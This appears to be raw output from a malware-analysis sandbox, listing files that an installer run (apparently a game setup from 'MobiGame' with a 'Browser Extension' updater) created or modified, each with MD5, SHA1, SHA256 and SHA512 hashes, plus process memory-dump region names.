SHA512 918a0e226c5ae5e388df7f68a893d86bf3aa3bfa2e914f4ad49881b3d8490fe39276207eb29c6c2d62cfe5b134250adb314fc4fe87d2c7e5f94e2ae54690d22e

C:\Windows\Installer\MSIDD43.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Windows\Installer\MSIDD43.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/1120-293-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/1120-294-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/1120-295-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/1120-302-0x0000000005FD0000-0x0000000006324000-memory.dmp

memory/1120-306-0x0000000002CA0000-0x0000000002CB0000-memory.dmp

memory/1120-319-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2220-327-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2220-328-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/2220-329-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/2220-339-0x0000000004A40000-0x0000000004A50000-memory.dmp

memory/2220-341-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2496-349-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/2496-350-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2496-360-0x0000000005B70000-0x0000000005EC4000-memory.dmp

memory/2496-361-0x00000000063D0000-0x000000000641C000-memory.dmp

memory/2496-362-0x0000000004A20000-0x0000000004A30000-memory.dmp

memory/2496-364-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/4748-375-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4748-374-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/4748-376-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4748-386-0x00000000068C0000-0x000000000690C000-memory.dmp

memory/4484-387-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/4484-388-0x0000000005360000-0x0000000005370000-memory.dmp

memory/4748-398-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4748-399-0x00000000073C0000-0x00000000073F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Browser Extension\updater.ini

MD5 e4701de3b4b546216451d0c2fab72d3d
SHA1 1fd5e15715b2ae521f8b6637d666a10b9c9eda1a
SHA256 db55d386663f7ebf9870ae62c5a91fa737a15146713a502925130a0fe3ad9a18
SHA512 3008e4dd7004c921317be0d8139a47a94cdf03f3849fd40f1be243702caa350a1cf31982c4ae3ad7759da9e93400f9a475e7f598c6c7e0e162e5e7dc0f10b27d

C:\Windows\Installer\e58bd3a.msi

MD5 2d9e93d7efdd29091807122268863bab
SHA1 79620e2cb35232c0e50d6a94ff02655f2dea696b
SHA256 ab6b3a30d643bd1a807d4415e554a7e005c9320d1adbd0bfb4666cf1509c3078
SHA512 b06d0a75631e32d4d22f65a82deb5304decdafd981bafc3aef3aca8c77293d2520125311b771fcf9709315fa1294ec5a072da4568339091a2021a7eab3c8b6b3

C:\Config.Msi\e58bd39.rbs

MD5 e64a58c04a59c2cd2c0c3ed104b304ce
SHA1 7d8f38cfa842daf1341fb00517c28350ff5067f4
SHA256 13e4aca0bf2146cf309779bd58e3ec54e322ce2b96523fe5277a9bc7c89be6de
SHA512 9d9afbee1a2f184a6ee4093dadc8438d8fc47950c287b6ffdcec929833ea70f0613d925d5a58939aa4ebb7066db1c469d294dad694a3733dfcc280903b2e7498

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f3a33206eb7acd14adabf8bfac78ad66
SHA1 8ba8fc4409b69f54b0e575e1d9d49ba23fd64661
SHA256 61f91508c8a55791da27c6715a69ed98ed6207f400ed29f3cf7a78d3544f13ca
SHA512 0e83f332835655f7d6ea093adfbb62f3110ae986e2198c4c308a40566daf697c5c9c51d41391d09bd0e41b64d6a8b5699bb376c0b31d8fd6ecdf526eb3a2fe87

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 08b1bc3dd994f1c31cbec85dbc37b9f5
SHA1 c0d0c5aa628dc3e0e6ac54046345a2aeadd1fb74
SHA256 9474638cb94211d4fa4fb04cf212d6875e3b0c8c14422926b46bf5ef4a860e6c
SHA512 03a891627399d72e1f8fec92ad7b49695fac40dd80e93b2c18b829ff2771508b27cd976c17d94cfe948e0de5bf8d8f213102e6fee14a64de1eebb1ea992b153c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6fb5895f-7fc9-4623-b9af-46748646b87f.tmp

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\122e0f12-4212-4ab2-9413-033f92742725.tmp

MD5 9eaf58857148485ed9846b65a576d4ce
SHA1 1e6db8bc3b0efd30328cde8fc87412f5d9e3149a
SHA256 56aa85396fb9d2fa37b9dbde8e094fd4ae60c9bfe88af10a2be387873a0e9cd5
SHA512 da39924f75851e734836e6e93a78b113f5825d6068be143d23a86d3365fe43ff15b930b9b34c542976bf60f30731cc4f269e8fe6b2da35781e17eb01d6a4568b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

MD5 561e0534e054dbf1b555daee05fd1ba2
SHA1 5f8975dc17373d7cfbe1c4ee9ca1602ea782a3b1
SHA256 3c47051594b110b0ac62b1c4201e0fa876525ce5c5a8344da027a70cc45d3310
SHA512 5690d0ef05c6e481a7580c522f59057ea22aa1b79e6fdacc456975f36e6993045437e18bbdf0c4c904e8c057f27eccea71d57b8d6dc88dd75ff820dc897261d4

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Temp\Pro6966.tmp

MD5 27931970a207104aef1bf5e876df72d1
SHA1 c887556f7b68a01cad1a80891dbe710ac94c369e
SHA256 d7caf088ea4653dee1bde8664827d051e02b377d354f39b559056c7f9ebca5b8
SHA512 52e050972eb4102fcaa49b875da572270bceba60fc1a724ac775721b67d70fffe79ab65238f96c52879b8a85bc0375e4d86a90cb28c025a2c598f2adb2701e94

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5bdf7cdf56eba701f5db006b46b6e6d9
SHA1 1c055ec9d7ff67a6aaef7db648c8b47983694093
SHA256 3fe81823082c24095220117a7714220f5fa311ed8dfd9f7b850745f652ffffbf
SHA512 cd5ce4ddb1c1995cf45210e54f265392b533eec695d39c96bf22e0fb44667f1b9ab670c68f9bc9ee165518f8e074dc4f118cb18bc030551fb776c27511c46e4b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 a6ef8b9182aec5c394691ddf0c0ac22f
SHA1 cfb907fcde73dcf81c975a1dcddcbb3252216c88
SHA256 2b3c021357cc31338fb11a85b37871bfa01fd25d4c374f27581a84868dafe337
SHA512 7ea832faa6cf305fe5411e031b3c3c6a8701c67e966adc1c2ad9df72379d7b36d22c55709deec3c44818dea227a165cd796cc2f512b5fb95fc4a7c1ebb1cf58c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RFe5981a9.TMP

MD5 d1d2a0003d6ae717a652c8ef7cc761e9
SHA1 8872161322c7c37f4aaf3f6a59657d7f4453d1a3
SHA256 5313d154001a0a765dcc8cf3b95e413d4408c205c0c32bf86a33c6dd8e7fb0c5
SHA512 c02de1aae08453386ada5e71b4dcbfa78025123ead34d6b01aef333474141fa5ab7b8fb155f804cea155ed90a3516298ce167170807bb4c83c0628fe9d316796

C:\Users\Admin\AppData\Local\Temp\Pro80DE.tmp

MD5 0c6982404ea88056e090dc67ff7dc467
SHA1 ea0c65e486eef042a62df1e3a0519c3b4ff55e36
SHA256 70e82ce55c841c21f0790217c4beffc37df50b052c2e65e8e12d8eeb0e7bd7db
SHA512 47b172f6c7fa868610c79f5363b658eff96dd5bf590c3a9b580dce333e316eaffc499aedc918e0b28c51a71afc068bca057fc0efaf242a772d8d3318835d592d

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9175662376e56b1aa7ea6c6099b81866
SHA1 291429094dfedd103909f5d15aa7fa09827e7d62
SHA256 4b3d007f50679fcff2e74762337d16821108b008ffa6d6c63dfc820effe033dc
SHA512 ccd8b177b1742270d6fe447f58ce7a54db456e06189e957f4b15e9fbcf32bf6d351b06243c413c3a1318e942d2ea819e87b1a7cdcb035355f0dd4e996f67b524

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RFe59a8f8.TMP

MD5 b0aa3c052ca544117dfb73d01242f436
SHA1 722cf8865b326b9d08c963b842dbe881792bbb56
SHA256 43f509016e7cd8933841cbe4c109bd1f90a9d9d3899739af083fdc307ab597b3
SHA512 bdd47905f662615fabb6fa0ddbe826b8e212c6960cdea349db3554faec3cd541de34aaa38f7a59a430e591d714ed6eebbf032e43318e6be436020ffe76b4ad20

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 73757bf89882ab31279dc84117599252
SHA1 9d46236925af0f222d54d58f6acd4b70f7b7948e
SHA256 919abaea64fcd623ce0518de9698723ff73b486e635b20ae49fa944e51235536
SHA512 604cdceaa4bd3dc94c123ed0f892d053576088ea8101635cc5934747e9d594a2641aa610765f929ec194a569e4b0b67bc64626931af1d17b0ed7089e2b1818ce

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 45f35144ee79e3987b674482f0d0c81c
SHA1 107ef7601edb0a9f1e564c63fe050768beed64d7
SHA256 0e49fcaf6918dcdd0724510362659fba946c4644ea33eee6f1d0089396151fd5
SHA512 1ebd10b224f08dbf3356ef11209c6eff2f62334047bc21e3c657268092c48c393aa4c1aed9f8a5f2c80bcf46a51462716e3d122063b6f950fd236953ee9f44c3

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 acf9766f4566de6c747b2c915a95e487
SHA1 03c3d2571dc497bbbde9bbdc6f3708ce159c2c11
SHA256 e64dd75f6ab32fa8664a631f1c39be05a4eac47462e739eeb8cc965e800d1944
SHA512 fd5abd06de9c6c63993248a86f83d8dd52ebb19dc5968e8c5a2824c6c4a4fb162e2f16f202eea7aad36a95bc7355511a655cd28780671544cc3aeae906a62bf2

memory/3732-1095-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1096-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1097-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1099-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1100-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1102-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1101-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1103-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

memory/3732-1104-0x0000022A4D770000-0x0000022A4D771000-memory.dmp

C:\Config.Msi\e58bd3c.rbs

MD5 ed12edd65a5a56c0693d52568c5ee730
SHA1 8170b69c087bebea950d74dfc9a09fca296cf0fb
SHA256 c4e23fc3ce1e71d7c75610e34b1c09323c626f2b3d4db5a4449e89527bad8a90
SHA512 b40f697e8fe9dccd326a4fae319207f87d5fd552bd04e83adc43a81f78393024649ab89a7272cdb5901b5519196c975d19628cb9ff55796b49180b79f7e8b60e

C:\Windows\Installer\e58bd3b.msi

MD5 e7114dd362a4799d13a3628d30b75c8d
SHA1 51b82c1d8e54bc357b4bc116d42430bda79cfbd9
SHA256 70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f
SHA512 9047a712939901b10cbdc86ef070d695ba373a5076d97545870c024580e3e53c6e0590e2eba162471b84bd8640b8ec1d853703ad8dfae783e2e360189fc981ba

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d82c769f03c6b3d8119b16f1a03d43ed
SHA1 1301dbeaeccebd9c2dfda670c441fa692fe10e8d
SHA256 34f6540a711a751a80e588f6d25996f858e77d13c49c0a34dd2ec7f52cd11c97
SHA512 fcdd325ec550a6477b1e02a8c7fdd130049e1e1bf5a1c855fed4c68698cdf0e1cdebad5c80b5c826e19df09bb9b8506553b2f08c24b46b936c6667f993e578d5

C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp

MD5 de6d3427599b4f5b7af2a726830b03fb
SHA1 8577c5d56bd691ab52689b7bbc31e1960be41f26
SHA256 e29eced37dc2720be796627562414b4fb0695789bb195ae431803c32e1c924e5
SHA512 a9d09c3717928c51ac2aaddaec4ad4c6bfc305ebb9316a2761c52364f753681ee3caf6d83833aed9bd8f48606039bc5d9a97c254faed8c982768b3eba178bb1a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a497abaf2d60c0343875efe1b50c3574
SHA1 03942966a34ffa5f5b52c03b2d40f998a1f2aa64
SHA256 99a26b4f722e1576288afd4a74b107e11de76667164c2f698c7d01b49233453e
SHA512 7a7dc5f942060f8dbdf10ea95fdd9c2da23f88e01f1112d6140212edd139a8a37e060bcfd69eebceeb29bfdee58b60e090eca52291aaeff62b5ec7eed3aedc35

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe

MD5 9ecaefbfe117aa590ee829a8f25ed7ed
SHA1 4f7d2be2f5169717d09ebaa59ae6d090277e658d
SHA256 4e0284ab368a7775a248084c60bdfa6c76cca113dff20d6bcdb58a7a88769641
SHA512 2dc86d6b28504d63543d91e7c6691bcc6850d19a35ad8320976398027cb10051037e28d5f1c3c89346161cf0a6c1761d668d123e9d00a940857c3888fb94719c

C:\Users\Admin\AppData\Local\MobiGame\logs\downloader.log

MD5 c02bb7320edba58ce50d5acf5de47f45
SHA1 dbc5002ec707f94beebe752b78470525f3089e21
SHA256 dd8565878ee4369dd18a839725c2491d03a0e56ec8b8f654874ccf6570824056
SHA512 ddfb19295505158cd987764812fc188a7f8263fca45ed427a0b13c5e2b4aecbaa4ef2e69b9cee9504a7f3f4c53c37aa71b5762f5ddee6dc3ea9a77e10397aba9

C:\Users\Admin\AppData\Local\MobiGame\logs\downloader.log

MD5 65dbce593062c272ea5321a3eff70742
SHA1 542e92b4dc1ee73d60e186ca06a80805bb72ad0c
SHA256 41ff72947e5f63363661b07945500e1dd4f2d69c5ca83100ffbf3dd8523b4066
SHA512 6a50b6ae5f5ebfb0a88c81e2fdd07fa3e07234a39b248d98511cb6ca24526cf8579be07b4cf9bb9bd43a61f1c1b5eac45543a97814588feaa6b4cae6a247f322

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9e88f6126e6c3aff2dafd78dcd94b5fb
SHA1 c7590b93a23bbb9cccb9c794269ebe80206d108d
SHA256 fefb57137e1aae28f795c25af90a04ae04dd297cadc4931875fe2afed707caa4
SHA512 52430c6edd93bb2494e5e2caf80d010cd1f3e1914af57a4d6fb83d8b9cabccb1b9e030c5653b077a3ba48cef4af1098763d19326d8e24ddf30277420386e354c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bbb38ed32704cf39e4ebb6401397b6eb
SHA1 ea41f4baff5c51078a3ae7d2cf6bf267d72746b4
SHA256 a10a0001c4f5d330b5e1af7cb4344305865109319dcd42c3aca46fa8c0378e3c
SHA512 c8a57923bcf81a5f8e8edd18a31e69912ff9f7fac999dc3100a7f362b31f101c4a52f87f1be3e7075ab3382a8544a793ede1b8bfe49915449e206965d2506099

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 dd36152efbf68da551997dfe865e64ba
SHA1 faa57e81c988990cee8d622dbebdc820706db0e0
SHA256 7f057f1208c55773a99b08c47c7005a2032c970b72523e0756e4da30d244b0f5
SHA512 d6da60ad068b7a78983cc0b641411827dd17b5de7d4edc3c7ab1997b934064b7e205621abb4fcacdf315fe062873cb9d1d58400015d2dfd74c7a800c5e8fd62e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a664d.TMP

MD5 51c1d9362c021c97f6006e3baffb8d06
SHA1 6d5b76098a80107b0dcf7a542e1cc5eeb3d601ee
SHA256 e27794593d113ff8eec1df61c3e48ff871d81441d5cb218518b0c0e4d0c0c68b
SHA512 ea9c754dbcfd2a31dd29b9506f19bfef0dd65ff993ab312a49762e16ae537eac42ec7e45ae8c2d96bccbddca0fa00a08fa131c3b7ecc1e50f7d8ed367df72c3a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 84df41e446c46ed18615d31d84e7df59
SHA1 8c1444f97af3015dac3c2ec032f648c5fd5fd30b
SHA256 cad1a01cfa9fd14e2efdefd5817dbcd43ac07ea03eeee99d1f16fca824ae3f92
SHA512 f7f9e713827a71e495b4886f07d8e5f509eac2df2ad0540528f5aa62ad1e8d7d12d087be585edfa52528884152aa1898c8f767b525b19d0a98f78fc29e297506

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e2565e589c9c038c551766400aefc665
SHA1 77893bb0d295c2737e31a3f539572367c946ab27
SHA256 172017da29bce2bfe0c8b4577a9b8e7a97a0585fd85697f51261f39b28877e80
SHA512 5a33ce3d048f2443c5d1aee3922693decc19c4d172aff0b059b31af3b56aa5e413902f9a9634e5ee874b046ae63a0531985b0361467b62e977dcff7fc9913c4d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 2800881c775077e1c4b6e06bf4676de4
SHA1 2873631068c8b3b9495638c865915be822442c8b
SHA256 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512 e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 fefdc9f60479ba26989e907bb39a70c0
SHA1 d7540fd6afe3f37fd8eeea058b765252abb2c277
SHA256 c48a6a3d641145f3a4d6761e44bdfbd13df00f07366e38e5d1ce4d771e52e644
SHA512 c05267428579cffa5180e05b4b7d9a864f6dbfd0a0cc4a5fca7db11d1a95cf8baca5da8075811085bcf889e81f2ef6e085a1e5e72a1728adc49a002907bdfd69

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 c6c201c282dcecc8619df2ab4822e8a0
SHA1 542dcc2e6c3e7ffa721ab233f43357edfac50785
SHA256 a6910521e89286df6f56763d2e074bb1127073029ca3ff5e55fde48c40f4f5f1
SHA512 5b1a877254462bcc6db356c6bb704c12d76c1e1476ccf22e0f95560f40681da0d8e137f83a58d01e7e4d791e22243f3f12e9f40260d19fd8b2bbf0410da80a73

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

MD5 bea64c447b0f2a1012d0ede8e09e700d
SHA1 03c4e014a1ed074ed2611b5889ed79b6f1ed8aa6
SHA256 34dcdd7a5b57897d1eb1a2620ae5bc31d4b5d80e761e62fb8cd3c2a3b907241f
SHA512 ac1c4b495b990d8fad333f54d3e61d5573efb7a0c7c584659cea48be8d4857461bb011b1f2a4966cd714bb9252cc1750e8e53f2203418ca19fcc8143fdea6b76

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

MD5 d6b36c7d4b06f140f860ddc91a4c659c
SHA1 ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA256 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA512 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 76a3f1e9a452564e0f8dce6c0ee111e8
SHA1 11c3d925cbc1a52d53584fd8606f8f713aa59114
SHA256 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c
SHA512 a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

MD5 45a177b92bc3dac4f6955a68b5b21745
SHA1 eac969dc4f81a857fdd380b3e9c0963d8d5b87d1
SHA256 2db3b6356f027b2185f1ca4bc6b53e64e428201e70e94d1977f8aab9b24afaeb
SHA512 f6a599340db91e2a4f48babd5f5939f87b907a66a82609347f53381e8712069c3002596156de79650511c644a287cbd8c607be0f877a918ae1392456d76b90ca

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 9d8cfaec22e61ca1b7cc22df63743709
SHA1 f88ffc0756ac9e7f5760076f741af490fcc8fc1a
SHA256 4e571a58acaa3f7fd70b6f4777a62cf09be98de4ae06ab86e8795c05f3b935cf
SHA512 41a35dcfccf501c7bee5b4febbb8a7cedf15c21921d4617dd48acf11af7e158b0ea92eb0476365a24eee760f66f6b32cbc17b8b3b247b89d4eb7a5ffa9199097

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 93ab4766e81bf575fb8211e6a7c487cf
SHA1 f16ebe1e59a21a2153037580f961f387ec42ea29
SHA256 7a093fa675cf9b6d530feb7fd0ab0d956cc19520bf871174856fe99b9d13ff96
SHA512 43d984cad3ec321c7b1c1caececaa8cf4b125643523d7fbea11c600cea6e79c6a4ce7c1775039ce437cddfd1ccd9364f38102f5442b7fb4d692aa780ab935ecb

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 aee98b9fd11fe0d9d4dea47b3dbc1e84
SHA1 1c2e72ec17b86591a28747324f3dffb72d645de3
SHA256 926ca373f3b8fa1e2c405f851430522f9c28d1c761b858f5bcd20a53f860ed0f
SHA512 7418cfa5028b652feae4e914fcfa50f0325e39800ee3711d2bc6a2ec6b350266ed8e164f45c4c0f2294183b7c93799e3f035382217dfd18cb561c2dbd4a6269b

C:\Users\Admin\AppData\Local\MobiGame\logs\mobihelper.log

MD5 9bdce776c3047e9b5160ab31a9eda595
SHA1 ae7b0871967a399d323df35a28336ae172ec89c4
SHA256 6254fe9db15fa1a42caa0f0f96482949629e8d9001a6487b347883803d43a441
SHA512 0e72210992b4a92a698beb0a6077d545b511f6b916c661c8d0a3711ba5f138390bf122881edb9066eb0ef43b6e274c94bbf325869e96c03f6c3f67021a8ab852

